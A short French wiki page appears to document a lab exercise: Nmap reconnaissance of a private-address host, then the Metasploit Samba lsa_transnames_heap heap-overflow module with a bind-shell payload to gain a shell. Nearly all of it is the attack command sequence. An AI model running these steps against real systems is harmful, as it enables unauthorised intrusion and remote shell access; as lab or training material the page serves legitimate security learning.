Ubuntu metasploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation Linux (Samba)
Module linux/samba/lsa_transnames_heap
Reconnaissance nmap -sT -A
Voir aussi Samba anonyme · Vsftp backdoor

Exploitation d'une faille Samba (débordement de tas lsa_transnames_heap) sur une cible Linux, après reconnaissance Nmap.

Procédure

nmap -sT -A -p0 192.168.0.20
search samba
use linux/samba/lsa_transnames_heap
show payloads
set payload linux/x86/shell_bind_tcp
set LPORT 8080
set RHOST 192.168.0.20
exploit
ifconfig

Voir aussi